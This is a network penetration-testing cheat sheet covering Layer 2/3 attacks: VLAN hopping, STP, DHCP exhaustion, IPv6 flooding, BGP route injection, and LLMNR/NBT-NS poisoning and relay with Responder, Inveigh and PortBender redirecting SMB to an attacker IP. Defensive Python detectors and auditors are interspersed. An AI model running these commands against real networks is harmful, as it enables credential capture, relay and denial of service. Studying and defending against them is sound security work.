Ethernet Testing (802.3)


  • Test wired network communications and identify active devices.

nmap

# Perform a ping sweep to identify live hosts
nmap -sn 192.168.1.0/24

arp-scan

# Discover devices using ARP scanning
arp-scan --interface=eth0 192.168.1.0/24

netdiscover

# Passive discovery of hosts on the subnet
netdiscover -r 192.168.1.0/24

VLAN Testing (802.1Q)


  • Detect VLAN segmentation flaws and potential VLAN hopping vulnerabilities.

vlan-hopper

# Attempt VLAN hopping attacks
vlan-hopper --interface=eth0

nmap

# Scan for devices across VLANs (other VLANs are reachable only via routing; -Pn skips host discovery, -sV probes service versions)
nmap -Pn -sV -T4 192.168.1.0/24
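
The checks above look for hosts; the defender-side counterpart is to look at what access-facing ports actually send. The following is an added example (not part of the original cheat sheet or of any tool it lists) that parses 802.1Q/802.1ad tag stacks from raw Ethernet frames and labels the two patterns that should never come from an access host: a double-tagged frame and a frame explicitly tagged with the native VLAN. The frames, MAC addresses and the native VLAN of 1 are constructed assumptions.

```python
import struct

# Constructed sample constants (standard EtherType values).
ETHERTYPE_8021Q = 0x8100   # customer VLAN tag
ETHERTYPE_8021AD = 0x88A8  # service-provider (QinQ) outer tag
ETHERTYPE_IPV4 = 0x0800


def parse_vlan_tags(frame):
    """Return (vlan_ids, inner_ethertype) for a raw Ethernet frame.

    Walks every 802.1Q/802.1ad tag that follows the 12-byte destination and
    source MAC addresses. The VLAN ID is the low 12 bits of the TCI; the
    PCP/DEI bits are masked off.
    """
    offset = 12
    vids = []
    while True:
        if offset + 2 > len(frame):
            raise ValueError("truncated frame: EtherType missing")
        (ethertype,) = struct.unpack_from("!H", frame, offset)
        offset += 2
        if ethertype not in (ETHERTYPE_8021Q, ETHERTYPE_8021AD):
            return vids, ethertype
        if offset + 2 > len(frame):
            raise ValueError("truncated frame: TCI missing")
        (tci,) = struct.unpack_from("!H", frame, offset)
        offset += 2
        vids.append(tci & 0x0FFF)


def classify_frame(frame, native_vlan=1):
    """Label a frame seen at an access-facing capture point.

    Hosts on an access port should send untagged frames only. Two tags is
    the double-tagging pattern VLAN hopping relies on; a single tag equal to
    the native VLAN is the other thing an access host has no reason to send.
    """
    vids, _ = parse_vlan_tags(frame)
    if len(vids) >= 2:
        return "double-tagged"
    if len(vids) == 1 and vids[0] == native_vlan:
        return "native-vlan-tagged"
    if len(vids) == 1:
        return "tagged"
    return "untagged"


def build_frame(vids, payload_ethertype=ETHERTYPE_IPV4):
    """Build a minimal constructed frame carrying the given 802.1Q tags (lab sample)."""
    dst = bytes.fromhex("ffffffffffff")
    src = bytes.fromhex("020000000a01")  # locally administered, constructed address
    tags = b"".join(struct.pack("!HH", ETHERTYPE_8021Q, vid) for vid in vids)
    return dst + src + tags + struct.pack("!H", payload_ethertype) + bytes(46)


def audit_capture(frames, native_vlan=1):
    """Return (index, label, vids) for every frame that is not plain untagged."""
    findings = []
    for i, frame in enumerate(frames):
        label = classify_frame(frame, native_vlan)
        if label != "untagged":
            findings.append((i, label, parse_vlan_tags(frame)[0]))
    return findings


if __name__ == "__main__":
    sample = [build_frame([]), build_frame([10]), build_frame([1, 20]), build_frame([1])]
    for finding in audit_capture(sample, native_vlan=1):
        print(finding)
```

On a real capture the frame bytes would come from a pcap reader instead of build_frame; the parser itself only assumes the standard 12-byte MAC header followed by the tag stack. Frames with more than one tag on an access port are the finding to chase, and a switch that strips or drops them (and that never uses VLAN 1 as a native VLAN on trunks) is the mitigation.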

PNAC Testing (802.1X)


  • Assess network access control mechanisms and identify bypass techniques.

responder

# Capture authentication attempts
responder -I eth0

eapmd5pass

# Test EAP-MD5 authentication brute-force
eapmd5pass -i eth0 -u <username>

STP Testing (802.1D)


  • Identify weaknesses in Spanning Tree Protocol (STP).

yersinia

# Launch Yersinia in interactive mode
yersinia -I

BPDU Injection

# Inject malicious STP BPDU packets
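
What the Spanning Tree checks above are looking for is a bridge that can talk its way into becoming root. The following is an added example (not from the original cheat sheet, and not Yersinia code) that decodes an 802.1D configuration BPDU and applies the same logic as root guard and BPDU guard: a BPDU advertising a root ID lower than the known root, or any BPDU at all on a port that should be an edge port, is a finding. The expected root bridge ID, the MAC addresses and the sample BPDUs are constructed assumptions; the parser expects the 35-byte BPDU body that follows the LLC header.

```python
import struct

BPDU_TYPE_CONFIG = 0x00
CONFIG_BPDU_LEN = 35
BPDU_FORMAT = "!HBBBH6sIH6sHHHHH"   # proto, ver, type, flags, root id, cost, bridge id, port, 4 timers


def parse_config_bpdu(data):
    """Decode an 802.1D configuration BPDU (the 35 bytes after the LLC header).

    Bridge IDs are 2 bytes of priority followed by the 6-byte bridge MAC;
    timer fields are in units of 1/256 second and are returned as seconds.
    """
    if len(data) < CONFIG_BPDU_LEN:
        raise ValueError("truncated BPDU")
    (proto, _version, bpdu_type, flags,
     root_prio, root_mac, root_cost,
     bridge_prio, bridge_mac, port_id,
     msg_age, max_age, hello, fwd_delay) = struct.unpack_from(BPDU_FORMAT, data, 0)
    if proto != 0 or bpdu_type != BPDU_TYPE_CONFIG:
        raise ValueError("not a configuration BPDU")
    return {
        "flags": flags,
        "root_id": (root_prio, root_mac.hex()),
        "root_cost": root_cost,
        "bridge_id": (bridge_prio, bridge_mac.hex()),
        "port_id": port_id,
        "message_age": msg_age / 256,
        "max_age": max_age / 256,
        "hello_time": hello / 256,
        "forward_delay": fwd_delay / 256,
    }


def build_config_bpdu(root_id, root_cost, bridge_id, port_id=0x8001):
    """Constructed configuration BPDU with default 802.1D timers (lab sample, not captured traffic)."""
    root_prio, root_mac = root_id
    bridge_prio, bridge_mac = bridge_id
    return struct.pack(BPDU_FORMAT, 0, 0, BPDU_TYPE_CONFIG, 0,
                       root_prio, bytes.fromhex(root_mac), root_cost,
                       bridge_prio, bytes.fromhex(bridge_mac), port_id,
                       0, 20 * 256, 2 * 256, 15 * 256)


def check_bpdu(data, expected_root_id, edge_port=False):
    """Apply root-guard and BPDU-guard style checks to one BPDU.

    expected_root_id is the (priority, mac_hex) of the bridge that should be
    root. STP treats the numerically lower (priority, MAC) as superior, so a
    BPDU advertising a root below the expected one is a superior-BPDU event.
    """
    bpdu = parse_config_bpdu(data)
    expected = tuple(expected_root_id)
    findings = []
    if edge_port:
        findings.append("bpdu-on-edge-port")      # end-host ports never carry BPDUs
    if bpdu["root_id"] < expected:
        findings.append("superior-root-claim")     # root guard would block this port
    if bpdu["root_id"] != expected and bpdu["root_id"] == bpdu["bridge_id"]:
        findings.append("unexpected-root-bridge")  # sender claims to be root itself
    return findings


if __name__ == "__main__":
    expected_root = (4096, "001122334455")
    rogue = build_config_bpdu((0, "0200deadbeef"), 0, (0, "0200deadbeef"))
    print(parse_config_bpdu(rogue))
    print(check_bpdu(rogue, expected_root))
```

The lower-wins comparison on the (priority, MAC) tuple is exactly the STP root election rule, which is why a bridge advertising priority 0 wins against a production root at 4096 unless root guard is enabled on the ports facing it.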

Local IP Protocols


  • Assess weaknesses in local IP-based protocols.

Protocols Tested: DHCP, PXE, LLMNR/NBT-NS/mDNS, WPAD

responder

# Capture LLMNR/NBT-NS/mDNS requests
responder -I eth0

dhcpig

# Perform a DHCP exhaustion attack
dhcpig -i eth0

Internal Routing Protocols


  • Identify vulnerabilities in internal routing protocols.

Protocols Tested: HSRP, VRRP, RIP, EIGRP, OSPF

yersinia

# Exploit HSRP/VRRP vulnerabilities using Yersinia
yersinia -I

Scapy

# Craft custom OSPF packets using Scapy
TODO

IPv6 Testing


  • Discover IPv6-enabled hosts and assess security weaknesses.

nmap

# Perform an IPv6 ping sweep (link-local targets also need the interface, e.g. -e eth0; a full /64 is far too large to sweep, so supply known hosts with -iL instead)
nmap -6 -sn fe80::/64

thc-ipv6

# Flood IPv6 routers with spoofed addresses (the tool takes the interface as its argument)
flood_router26 eth0

BGP / iBGP Testing - To Review


  • Assess exposure or misconfiguration of BGP sessions within internal routing (iBGP) environments.

nmap

# Scan for open BGP port (TCP 179)
nmap -p 179 <target>

tcpdump

# Capture BGP session traffic
tcpdump -ni eth0 port 179

ExaBGP / GoBGP (Lab/Sim Only)

# Simulate BGP peering and inject/receive BGP routes
# Requires controlled environment and BGP-capable target

Lab-Based or Advanced Scenarios:

ExaBGP (route injection simulation)

# Define a custom BGP session and announce routes (lab only)
exabgp exabgp.conf

Sample exabgp.conf

neighbor 10.0.0.1 {
  router-id 10.0.0.2;
  local-address 10.0.0.2;
  local-as 65001;
  peer-as 65001;
  static {
    route 192.168.100.0/24 next-hop 10.0.0.2;
  }
}

Things to validate:

  • Is TCP 179 accessible internally without filtering?
  • Are iBGP sessions authenticated (MD5)?
  • Are there any rogue BGP speakers allowed?
  • Are prefix-lists and route filters applied?
  • Can a rogue peer inject routes into the iBGP mesh?
  • Is there route reflector logic that could propagate malicious prefixes?
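
Most of the items in the list above can be answered from the router configuration before any packet is sent. The following is an added example (not part of the original cheat sheet, and not ExaBGP or GoBGP code) that parses the neighbor statements of an IOS-style `router bgp` section and reports iBGP peers that are missing from an approved peer list, have no session password, have no inbound prefix-list or route-map, or are route-reflector clients without inbound filtering. The configuration syntax is IOS-like, the sample config, the AS number 65001, the peer addresses and the approved-peer list are all constructed assumptions; the TCP 179 reachability check stays with the nmap command above.

```python
import re

NEIGHBOR_RE = re.compile(r"^\s+neighbor\s+(\S+)\s+(.+)$")


def parse_bgp_neighbors(config_text):
    """Collect per-neighbor settings from the 'router bgp' section of an IOS-style config.

    Returns (local_as, {peer: {remote_as, password, inbound_filter, rr_client}}).
    Only the keywords the audit needs are tracked.
    """
    local_as = None
    neighbors = {}
    in_bgp = False
    for line in config_text.splitlines():
        if line.startswith("router bgp "):
            local_as = int(line.split()[2])
            in_bgp = True
            continue
        if in_bgp and not line.startswith(" "):
            in_bgp = False            # "!" or the next top-level section ends the block
        if not in_bgp:
            continue
        m = NEIGHBOR_RE.match(line)
        if not m:
            continue
        peer, words = m.group(1), m.group(2).split()
        entry = neighbors.setdefault(peer, {"remote_as": None, "password": False,
                                            "inbound_filter": False, "rr_client": False})
        if words[0] == "remote-as":
            entry["remote_as"] = int(words[1])
        elif words[0] == "password":
            entry["password"] = True
        elif words[0] in ("prefix-list", "route-map", "filter-list") and words[-1] == "in":
            entry["inbound_filter"] = True
        elif words[0] == "route-reflector-client":
            entry["rr_client"] = True
    return local_as, neighbors


def audit_ibgp(config_text, approved_peers):
    """Return (peer, issue) pairs for the iBGP checks in the 'Things to validate' list."""
    local_as, neighbors = parse_bgp_neighbors(config_text)
    findings = []
    for peer, n in sorted(neighbors.items()):
        if n["remote_as"] != local_as:
            continue                  # eBGP peers are out of scope for this iBGP audit
        if peer not in approved_peers:
            findings.append((peer, "not in the approved iBGP peer list (possible rogue speaker)"))
        if not n["password"]:
            findings.append((peer, "session not authenticated (no neighbor password / MD5)"))
        if not n["inbound_filter"]:
            findings.append((peer, "no inbound prefix-list/route-map: peer can inject arbitrary prefixes"))
        if n["rr_client"] and not n["inbound_filter"]:
            findings.append((peer, "route-reflector client without inbound filtering: "
                                   "injected prefixes would be reflected to the whole mesh"))
    return findings


# Constructed sample config (IOS-style syntax, not taken from a real device).
SAMPLE_CONFIG = """\
router bgp 65001
 bgp router-id 10.0.0.1
 neighbor 10.0.0.2 remote-as 65001
 neighbor 10.0.0.2 password EXAMPLE-SECRET
 neighbor 10.0.0.2 prefix-list IBGP-IN in
 neighbor 10.0.0.3 remote-as 65001
 neighbor 10.0.0.3 route-reflector-client
 neighbor 10.0.0.9 remote-as 65001
 neighbor 198.51.100.1 remote-as 64500
!
ip prefix-list IBGP-IN seq 5 permit 10.0.0.0/8 le 24
"""
APPROVED_PEERS = {"10.0.0.2", "10.0.0.3"}

if __name__ == "__main__":
    for peer, issue in audit_ibgp(SAMPLE_CONFIG, APPROVED_PEERS):
        print(f"{peer}: {issue}")
```

Run against a real `show running-config` export, the peer allowlist is the thing to get right: every iBGP neighbor that is not on it is either an undocumented speaker or a rogue one, and both deserve a ticket.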

L2/L3 Segregation Evasion & Poisoning - To Review


  • Assess poisoning and credential capture techniques across segmented or proxied environments (e.g., behind RRAS, NAT, or L3 boundaries).

Context: Responder and similar tools often fail in segmented networks due to lack of broadcast visibility (LLMNR/NBT-NS/mDNS), or because traffic cannot naturally reach the attacker’s box. Some techniques to overcome this include NAT-based traps, active relay attacks, and TCP redirection.

PortBender

# Hijack an existing listening port and redirect to attacker (e.g., SMB/445)
PortBender.exe add -p 445 -r <attacker_ip> -rp 445

Inveigh (PowerShell)

# Run Inveigh with elevated privileges to poison and capture hashes
Invoke-Inveigh -NBNS Y -mDNS Y -LLMNR Y -HTTP Y -ConsoleOutput Y

Inveigh-Relay (C# or PowerShell)

# Relay captured credentials to target services (e.g., SMB/RDP/LDAP)
Invoke-InveighRelay -Target 10.0.0.5 -SMBRelay Y

Responder (when NAT rule or direct trigger is available)

# Standard LLMNR/NBT-NS/mDNS poisoning (not functional across routed networks by default)
responder -I eth0

Things to consider:

  • Can you use PortBender to redirect traffic from trusted services to the attacker?
  • Is traffic NAT’d or routed to you explicitly? Can you trigger this via a phishing payload or internal tooling?
  • Is the poisoning tool (e.g., Inveigh/Responder) positioned in the right segment to see broadcasts or receive direct hits?
  • Would relaying be possible post-capture (e.g., to LDAP/SMB/RDP)?
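
Both the Local IP Protocols section and the context paragraph above turn on the same thing: a poisoner answers LLMNR/NBT-NS/mDNS name queries that no real host would answer. The following is an added example (not part of the original cheat sheet, and not Responder or Inveigh code) of the defender's view of that traffic. It parses LLMNR messages, which use the DNS wire format on UDP 5355, and flags two signals: a response for a canary name that does not exist anywhere on the network, and a single source answering for several different names. The canary name, the sample queries and responses, and the IP addresses are constructed assumptions.

```python
import struct

LLMNR_PORT = 5355            # LLMNR is UDP 5355 to 224.0.0.252 / ff02::1:3
QTYPE_A = 1


def encode_name(name):
    """DNS-style label encoding used by LLMNR: length-prefixed labels, zero-terminated."""
    out = b""
    for label in name.split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(packet, offset):
    """Decode a (possibly compressed) name; return (name, offset_after_name)."""
    labels = []
    end = None
    while True:
        length = packet[offset]
        if length == 0:
            offset += 1
            break
        if length & 0xC0 == 0xC0:                  # compression pointer
            pointer = struct.unpack_from("!H", packet, offset)[0] & 0x3FFF
            if end is None:
                end = offset + 2
            offset = pointer
            continue
        offset += 1
        labels.append(packet[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), (end if end is not None else offset)


def parse_llmnr(packet):
    """Parse an LLMNR query or response (same wire format as a DNS message)."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack_from("!HHHHHH", packet, 0)
    offset = 12
    questions, answers = [], []
    for _ in range(qdcount):
        name, offset = decode_name(packet, offset)
        qtype, _qclass = struct.unpack_from("!HH", packet, offset)
        offset += 4
        questions.append((name, qtype))
    for _ in range(ancount):
        name, offset = decode_name(packet, offset)
        rtype, _rclass, _ttl, rdlen = struct.unpack_from("!HHIH", packet, offset)
        offset += 10
        rdata = packet[offset:offset + rdlen]
        offset += rdlen
        if rtype == QTYPE_A and rdlen == 4:
            rdata = ".".join(str(b) for b in rdata)
        answers.append((name, rtype, rdata))
    return {"id": txid, "is_response": bool(flags & 0x8000),
            "questions": questions, "answers": answers}


def build_llmnr_query(txid, name):
    """Constructed LLMNR A query for name (lab sample)."""
    return (struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
            + encode_name(name) + struct.pack("!HH", QTYPE_A, 1))


def build_llmnr_response(txid, name, ip):
    """Constructed LLMNR response mapping name to ip; the answer name points back at the question."""
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", QTYPE_A, 1)
    answer = (b"\xC0\x0C" + struct.pack("!HHIH", QTYPE_A, 1, 30, 4)
              + bytes(int(x) for x in ip.split(".")))
    return header + question + answer


def analyze(stream, canary_names, threshold=3):
    """Flag LLMNR responses that look like a poisoner rather than a real host.

    stream is an iterable of (source_ip, udp_payload). A genuine host answers
    only for its own name, so an answer for a canary name (a hostname that
    exists nowhere) is fabricated, and one source answering for many names
    is the signature of a tool that answers everything.
    """
    canary = {n.lower() for n in canary_names}
    answered_by = {}
    findings = []
    for src_ip, payload in stream:
        msg = parse_llmnr(payload)
        if not msg["is_response"]:
            continue
        for name, _rtype, rdata in msg["answers"]:
            if name.lower() in canary:
                findings.append({"kind": "canary-answered", "src": src_ip, "detail": f"{name} -> {rdata}"})
            answered_by.setdefault(src_ip, set()).add(name.lower())
    for src_ip, names in answered_by.items():
        if len(names) >= threshold:
            findings.append({"kind": "answers-many-names", "src": src_ip, "detail": ",".join(sorted(names))})
    return findings


# Constructed sample stream: one legitimate host, one source answering everything.
CANARY_NAMES = ["fileshare-01"]
SAMPLE_STREAM = [
    ("10.0.0.20", build_llmnr_query(0x1001, "ws20")),
    ("10.0.0.20", build_llmnr_response(0x1001, "ws20", "10.0.0.20")),
    ("10.0.0.99", build_llmnr_response(0x2001, "fileshare-01", "10.0.0.99")),
    ("10.0.0.99", build_llmnr_response(0x2002, "wpad", "10.0.0.99")),
    ("10.0.0.99", build_llmnr_response(0x2003, "printsrv", "10.0.0.99")),
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_STREAM, CANARY_NAMES):
        print(finding)
```

The canary signal is the cheap one to deploy: a scheduled job on a workstation that resolves a name which is not registered anywhere will only ever get an answer from a poisoner, and the source address in that answer is the host to investigate. The segmentation point from the context paragraph cuts both ways: the sensor, like the poisoner, has to sit in a segment where it can see the multicast, so one sensor per broadcast domain is needed.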